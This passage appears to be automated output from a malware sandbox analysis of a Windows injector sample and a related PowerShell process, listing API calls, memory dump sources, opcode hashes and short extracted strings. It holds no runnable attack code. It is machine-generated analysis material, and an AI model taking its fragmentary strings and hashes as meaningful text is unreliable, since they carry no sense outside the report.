                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
                                            • GlobalFree.KERNEL32(?), ref: 004038E6
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 1100898210-3081826266
                                            • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                            • Instruction ID: 4defd9e359f6bb8273ced32a5a12906ada9a5e6c3dc807c4d7f8d8681d186cd1
                                            • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                            • Instruction Fuzzy Hash: 68E01233901520AFCA216F55ED04B5E77ADAF58B22F09417BF8807B2608B785C929BD8
                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B7F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-224404859
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CCB
                                            • CharNextA.USER32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CDC
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a7e4ab0b280f1c2fa9b30f0b8109d173999bf59b4f288cc2247ade0d10296fed
                                            • Instruction ID: fcddcd6f1bb0e45f35e2abf7a269fba706f7ac7e0c9de3a7a6b7ae7eee1f9272
                                            • Opcode Fuzzy Hash: a7e4ab0b280f1c2fa9b30f0b8109d173999bf59b4f288cc2247ade0d10296fed
                                            • Instruction Fuzzy Hash: 41526A30B00219CFDF64CFA4C9547ADBBB2FF95200F14859AD40AAB351FB31AA86DB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                            • API String ID: 0-3727103184
                                            • Opcode ID: da7e5a6e489a58b8b6e0ec255cda322ce07926e77ad733b6d15dcbc41a0e28ca
                                            • Instruction ID: 45d0ba21adda68ceb663eafd250452dca1f311190e42aa64e1df8a2a643bfa64
                                            • Opcode Fuzzy Hash: da7e5a6e489a58b8b6e0ec255cda322ce07926e77ad733b6d15dcbc41a0e28ca
                                            • Instruction Fuzzy Hash: 3DA285B0B00214DFDB24CBA8C455B9ABBB2AF84314F218569D9459F786CB72EC85CFD1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360898996.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                            • API String ID: 0-1399123086
                                            • Opcode ID: ec01de394fa4f45d835989f582473f6f923c18acb6e07e6a85c6b698e40dd77a
                                            • Instruction ID: b47436ef400340300934a1ab96fd029edfac9f35f3c1e521eef9dbaab1f9a218
                                            • Opcode Fuzzy Hash: ec01de394fa4f45d835989f582473f6f923c18acb6e07e6a85c6b698e40dd77a
                                            • Instruction Fuzzy Hash: 4F42D371B60205CFCB268F68C551AEBBBF2AF84394F14806AE9059F795DB31DC41CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                            • API String ID: 0-477184059
                                            • Opcode ID: f436d8ed059b8330d9ae6570b6bcd6ffec8c558c8c7f7af82576cf216646c376
                                            • Instruction ID: caa76650971c70cf43b6131150abf5f5323d5878d8199f7d57771b0ab8b3ce5a
                                            • Opcode Fuzzy Hash: f436d8ed059b8330d9ae6570b6bcd6ffec8c558c8c7f7af82576cf216646c376
                                            • Instruction Fuzzy Hash: 718293B0A00214DFDB20CB98C451F9ABBB2EF84714F21855AE9456F786CB76EC85CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360898996.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$\5)$\5)$tPfq$tPfq$$fq$$fq$$fq
                                            • API String ID: 0-3499730968
                                            • Opcode ID: 3e6881a0cf58b5ad1be284cc02473a2894123add0a9736f4e5a6eb07614905da
                                            • Instruction ID: 701710cc999ebcdb1997fa560eadf58b09246f96c2aef5ecd02bc49b935cf5d8
                                            • Opcode Fuzzy Hash: 3e6881a0cf58b5ad1be284cc02473a2894123add0a9736f4e5a6eb07614905da
                                            • Instruction Fuzzy Hash: 6A524730B20306DFCB15DF68C5516EABBE2BF95350F2484AAE9259F291DB31DC41CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$tPfq$tPfq$$fq
                                            • API String ID: 0-2123550768
                                            • Opcode ID: d22f0c12511fea83a5f07fd0f4bc4cda75b8de86aa41e609d30da51c1e54527b
                                            • Instruction ID: 6e3e04d689270ceb2d27e36e9488f8ffc69f5094ed71f929456a9c155ac29f8d
                                            • Opcode Fuzzy Hash: d22f0c12511fea83a5f07fd0f4bc4cda75b8de86aa41e609d30da51c1e54527b
                                            • Instruction Fuzzy Hash: 3432D4B0B102099FDB14DBA8C451B9ABBB3EF85304F15C06AE9459F786CB72EC45CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$tPfq$tPfq
                                            • API String ID: 0-4215353002
                                            • Opcode ID: 57d6d06b48364e4d4e18fe3d4d1451a5ad717fa0a28014544ad0b79f65f2deef
                                            • Instruction ID: d1b1f77cac9fbc4b8ae18ef668e1505d78527203e189acf87b70536fce35a7e5
                                            • Opcode Fuzzy Hash: 57d6d06b48364e4d4e18fe3d4d1451a5ad717fa0a28014544ad0b79f65f2deef
                                            • Instruction Fuzzy Hash: 467280B0B00215DFDB54CF98C891B9ABBB2AF85304F14C0AAD9499F785CB71ED85CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$$fq$$fq$$fq
                                            • API String ID: 0-3759051638
                                            • Opcode ID: d8d55b491d5ade491bd32cbe4cb04b36cd5cf57b083915ece319757dffabaae0
                                            • Instruction ID: ebe36ec1105f5786a230cd3b7b1aa3e356d4966dcdb35e5a9444ed063b28299b
                                            • Opcode Fuzzy Hash: d8d55b491d5ade491bd32cbe4cb04b36cd5cf57b083915ece319757dffabaae0
                                            • Instruction Fuzzy Hash: B641C7B1B152459FCB159AA488316EB7FA2DFC2210F14846BD981CB3A1DB36CD46C7A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq
                                            • API String ID: 0-359900465
                                            • Opcode ID: 8bdc1c64e84fa1ce7243c842d7b24ac80362636ea5d1fdedad8f396052f36688
                                            • Instruction ID: 4a518719303b24e8911004c9c80292c495d1ba7220ce6092df8e8840fd8e7e21
                                            • Opcode Fuzzy Hash: 8bdc1c64e84fa1ce7243c842d7b24ac80362636ea5d1fdedad8f396052f36688
                                            • Instruction Fuzzy Hash: 581206F2B143559FCB158BA888217ABBBA2EFC2210F14C4ABD585CB751DB31EC45C7A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq
                                            • API String ID: 0-751858264
                                            • Opcode ID: 67ae24aa3a3b820c58c059f5754030a3a1268b20400e7f016da7ad91a63173e5
                                            • Instruction ID: 32d88c43638b4cb9f1b89d44e26f75237258eb1944cc8acd443898905a1c666f
                                            • Opcode Fuzzy Hash: 67ae24aa3a3b820c58c059f5754030a3a1268b20400e7f016da7ad91a63173e5
                                            • Instruction Fuzzy Hash: 0A2251B07102149FC754DB68CC91B9BBBA2AF85704F508495E9099F781CB72ED86CFE1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$|
                                            • API String ID: 0-3203227909
                                            • Opcode ID: 056b685e70a4ef5e2202f80ce86b4bbe37a20813501604bb730b522bdb62f3a5
                                            • Instruction ID: f903ff8ee692a0c204992f3a32fb7d64d2c1d9e6bed73efb320c95530d82ac33
                                            • Opcode Fuzzy Hash: 056b685e70a4ef5e2202f80ce86b4bbe37a20813501604bb730b522bdb62f3a5
                                            • Instruction Fuzzy Hash: 6F226DB4A00214DFDB54CB58C891F9ABBB2AF84704F14C4D9E948AB791CB72ED85CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: tPfq$tPfq
                                            • API String ID: 0-2659045182
                                            • Opcode ID: ae59b8dd9ba80a31bd81ac6b09b04fadfca45521df854d2ad0e28b6deff3078a
                                            • Instruction ID: f26be192914aa1b4c758c7aacbd770f238291b0d047eff660f84a3025ce02a86
                                            • Opcode Fuzzy Hash: ae59b8dd9ba80a31bd81ac6b09b04fadfca45521df854d2ad0e28b6deff3078a
                                            • Instruction Fuzzy Hash: CE5148B1B143469FCB254BA988307ABBFA69FC6710F14846BD595CB3A2CA35DC41C3A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq
                                            • API String ID: 0-2007657732
                                            • Opcode ID: 55276c3b7ff8bf818a399c6748cc7fae6d4051782a4968cb3647d9915ee6bcd4
                                            • Instruction ID: c4ea4de140caed3e1291d2273c4653036aec3a3016bf4883b5c658f70e8fd725
                                            • Opcode Fuzzy Hash: 55276c3b7ff8bf818a399c6748cc7fae6d4051782a4968cb3647d9915ee6bcd4
                                            • Instruction Fuzzy Hash: 57526BB0B00215DFDB54CB58C891B9ABBB2AF84704F14C0D9E9499B792CB72ED85CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq
                                            • API String ID: 0-2007657732
                                            • Opcode ID: 765da91095bad80d9f7639a9e86ef2b36d2c125d08ca0c8d85a620e5ecef7efc
                                            • Instruction ID: 9d59116bf71f173a184c3c19e4c874dc327da92fe1ea38415dd1029f88f63c19
                                            • Opcode Fuzzy Hash: 765da91095bad80d9f7639a9e86ef2b36d2c125d08ca0c8d85a620e5ecef7efc
                                            • Instruction Fuzzy Hash: 4B424FB07102149FC754DB58CC91BDBBBA2AF89704F508499E9099B781CB72ED86CFE1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq
                                            • API String ID: 0-2007657732
                                            • Opcode ID: 536e882254d504f66b23c277f7f2cd6c86dab48abd947abb1086b6886da21c0a
                                            • Instruction ID: 99280c82acdc4e0de15b386386313f4489830f8a92218afef09bedda7f257e9c
                                            • Opcode Fuzzy Hash: 536e882254d504f66b23c277f7f2cd6c86dab48abd947abb1086b6886da21c0a
                                            • Instruction Fuzzy Hash: CD124FB07102149FC754DB98CC91B9BBBA2AF89704F508495E9099F781CB72ED86CFE1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360898996.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq
                                            • API String ID: 0-2007657732
                                            • Opcode ID: 4251f5158026da11eeb45c63fe9bde986ff18c649721c6565472dc2b619ba27a
                                            • Instruction ID: 5794f9fead096a5762f4ad3a9ef2af0dcecc685d3e8a9fec845c9f4d15c01794
                                            • Opcode Fuzzy Hash: 4251f5158026da11eeb45c63fe9bde986ff18c649721c6565472dc2b619ba27a
                                            • Instruction Fuzzy Hash: C0213AB2A70205DBCF214E6585417FBB6E19F807C0F144035E911DF68AEA75C980DBE2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq
                                            • API String ID: 0-2007657732
                                            • Opcode ID: 7c0dfa49ec8b7492b41866d5284ae51c265f08948d48e55c92673f20624b5ac3
                                            • Instruction ID: 82af2577ac0ba9f07317ca28e0733b8b45b970a4fb5f707a954fc9224a56c68e
                                            • Opcode Fuzzy Hash: 7c0dfa49ec8b7492b41866d5284ae51c265f08948d48e55c92673f20624b5ac3
                                            • Instruction Fuzzy Hash: D40126303453402BD3189B75AC90B6E2F63EFC1600F2408ADD0469F3EACDA06C0997A5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq
                                            • API String ID: 0-2007657732
                                            • Opcode ID: aa4c3ae0d4bb3ccd4b6ecd584c66b2c695523a149ba5b75102bbcac2d08d2730
                                            • Instruction ID: df8a7ee3ccffc38bc1545b5751c7e9cad8bfa17a82da3e5a7ca84a2190defa84
                                            • Opcode Fuzzy Hash: aa4c3ae0d4bb3ccd4b6ecd584c66b2c695523a149ba5b75102bbcac2d08d2730
                                            • Instruction Fuzzy Hash: C7F090303403002BD21CAA6AAC91F6F765BEBC5A50F60597CE1065F3EADDA1AC0956A5
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360877380.00000000092A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 124e6fc5ac385540c2685b36c0b1367ca66c221b98a3dc0689f2292cabde76b2
                                            • Instruction ID: 2fdb14d7bc3be56ddfc6cb359222e34008fb8d50232eb1f6b40760ca4f19591f
                                            • Opcode Fuzzy Hash: 124e6fc5ac385540c2685b36c0b1367ca66c221b98a3dc0689f2292cabde76b2
                                            • Instruction Fuzzy Hash: 7C021B75A112599FCB05CFA8C994AEEBBF2FF49310F248559E804AB361C731EC81CB90
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08552ed993573111b8b6a51c7ca8873a684590ecc868735ec2b409d05358d557
                                            • Instruction ID: 52b4101aabfbf79a4c10e8a166624194de31bdf31bec29a08dfb6ff31a5e79b5
                                            • Opcode Fuzzy Hash: 08552ed993573111b8b6a51c7ca8873a684590ecc868735ec2b409d05358d557
                                            • Instruction Fuzzy Hash: D3E16DB0F10218DFDB64DBA8C891B9ABBB2AF85304F1084D6D549AB785CB31DD85CF91
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d6ef03de52cb9d4bec191a32c3727268427d338e5100034bf07d082b16c00d24
                                            • Instruction ID: 1b3fa7dfa394af77def9c92636aedbc5b35ee756406f76ae0692cc3b127feee5
                                            • Opcode Fuzzy Hash: d6ef03de52cb9d4bec191a32c3727268427d338e5100034bf07d082b16c00d24
                                            • Instruction Fuzzy Hash: FFC18E35A00248DFCB14DFA4D544AADBBB2FFC4311F158569E406AB365EB34ED89CB90
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ffd25b3b690c75cf9bde5a46917014cfa34f38083c73bd69ec406edc88f4d9a
                                            • Instruction ID: 3d9b4ac7dccc0c1ea4e264806e966d8dbccd942e5ce688fb44190586ef7ffa8b
                                            • Opcode Fuzzy Hash: 0ffd25b3b690c75cf9bde5a46917014cfa34f38083c73bd69ec406edc88f4d9a
                                            • Instruction Fuzzy Hash: 0C911A6140E3E59FDB079B3C99B11D67F70AE4322470A05D7C480CF2A3E929AD4ED7A6
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cfa87d9cecddd676ecad9cea9320027663205978f5d4bbd361811797df1c6d1c
                                            • Instruction ID: 163ea075e11ca50ceb0e1ae1137ea9fd4fc7480b67251e58cdceb9d46ec050ba
                                            • Opcode Fuzzy Hash: cfa87d9cecddd676ecad9cea9320027663205978f5d4bbd361811797df1c6d1c
                                            • Instruction Fuzzy Hash: B7715CB17103168FCB149E6984212EBBBA5EFC5290F15847BD985CB781DB70DD41CBA3
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360898996.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92b0000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360877380.00000000092A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92a0000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360877380.00000000092A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92a0000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360877380.00000000092A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92a0000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360877380.00000000092A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92a0000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348028471.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2d0d000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Memory Dump Source
